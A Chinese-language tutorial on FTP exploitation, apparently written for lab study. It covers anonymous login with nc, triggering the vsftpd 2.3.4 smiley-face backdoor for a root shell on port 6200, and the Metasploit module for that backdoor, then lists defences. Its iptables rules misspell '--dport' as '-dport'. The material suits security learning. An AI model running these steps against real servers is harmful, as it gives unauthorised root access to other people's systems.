此文章仅用于学习研究使用,请勿用于违法犯罪,请遵守《网络安全法》等相关法律法规。
FTP漏洞利用
FTP协议介绍
FTP(文件传输协议)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP连接使用21号端口
用户分类:
- Real用户(普通用户)
- Administrator
- 匿名用户(Anonymous)
FTP文件传输格式
- ASCII
- 二进制模式
利用FTP匿名登录漏洞
由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器
例:使用nc命令匿名登录
nc 192.168.20.134 21
USER anonymous
PASS 123 //密码任意填写
利用FTP后门漏洞
这里讲解的漏洞为vsftpd笑脸漏洞,当进行FTP认证时,如果用户名USER中包含:)
,那么直接就会触发监听6200端口连接的shell(并且通过后门登录后,权限为root权限)
该漏洞可通过nessus或nmap等漏洞扫描工具扫描到(该后门存在于vsftpd版本2.3.4)
1、直接利用该漏洞原理,登录FTP
首先进行登录FTP,在用户名后加上:)
,输完任意密码后回车
再打开一个终端,使用6200端口可直接登陆到系统后门。登录后可以输入id查看用户等
2、使用metasploit工具自动化利用漏洞
首先使用msfconsole
命令启动工具,输入search vsftpd搜索渗透测试模块
使用该测试模块
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
显示没有payload,可以跳过选择payload的步骤,直接配置模块选项。先查看有哪些选项可配置
show option
配置RHOSTS参数
set rhosts 192.168.20.134
使用exploit
命令开始执行测试
输入一些基本命令,发现成功登陆后门
FTP漏洞防护
- 修改配置文件,禁止匿名用户登陆
升级版本,对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口
iptables -A INPUT -p tcp -dport 6200 -j DROP iptables -A OUTPUT -p tcp -dport 6200 -j DROP